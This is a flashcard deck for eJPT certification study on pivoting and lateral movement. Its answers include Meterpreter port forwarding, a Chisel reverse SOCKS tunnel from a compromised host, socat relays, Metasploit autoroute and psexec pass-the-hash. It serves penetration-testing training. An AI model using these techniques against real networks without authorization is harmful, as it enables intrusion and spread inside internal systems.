← All EJPT Flashcard Decks

Pivoting and Lateral Movement Flashcards

7 cards from real EJPT practice questions. Tap to flip, then mark Knew It or Still Learning — missed cards come back until you master them.

Read the first 7 Pivoting and Lateral Movement flashcards as text
  1. Which Meterpreter command is used to perform local port forwarding — for example, forwarding local port 3389 to an internal RDP service at 192.168.1.50:3389?

    Answer: portfwd add -l 3389 -r 192.168.1.50 -p 3389

    The Meterpreter `portfwd add` command creates a local port forward from the attacker's port to an internal host and port through the compromised session.

  2. When using SSH remote port forwarding with '-R 8080:localhost:80', which machine listens on port 8080?

    Answer: The remote SSH server

    With SSH -R (remote forwarding), the remote server opens the specified port and forwards incoming connections back to the local machine's specified address and port.

  3. A pentester uses Chisel for pivoting. After running 'chisel server -p 8000 --reverse' on the attacker machine, what command is run on the compromised host to create a reverse SOCKS proxy?

    Answer: chisel client attacker_ip:8000 R:socks

    In Chisel's reverse tunnel mode, the client on the compromised host connects back to the server and the R:socks argument creates a reverse SOCKS5 proxy.

  4. What is the purpose of the Metasploit post module 'post/multi/manage/autoroute'?

    Answer: Automatically add routes for subnets reachable by a compromised session

    The autoroute post module automatically identifies and adds Metasploit routes for all subnets accessible through a given session.

  5. A pentester needs to forward traffic to an internal Windows host's SMB port (445) through a pivot. After configuring the route in Metasploit, which module could they use to perform pass-the-hash against the internal target?

    Answer: exploit/windows/smb/psexec

    The psexec module supports pass-the-hash authentication and can be routed through an existing pivot to attack internal SMB targets.

  6. Which command lists active port forwards in a Meterpreter session?

    Answer: portfwd list

    The `portfwd list` command in Meterpreter displays all currently configured local port forwarding rules for that session.

  7. After compromising a Linux pivot host, a pentester uses socat to forward connections. Which socat command forwards TCP port 4444 on the pivot to 192.168.1.100:4444?

    Answer: socat TCP-LISTEN:4444,fork TCP:192.168.1.100:4444

    Socat's TCP-LISTEN with fork creates a listening socket that relays each accepted connection to the specified remote address and port.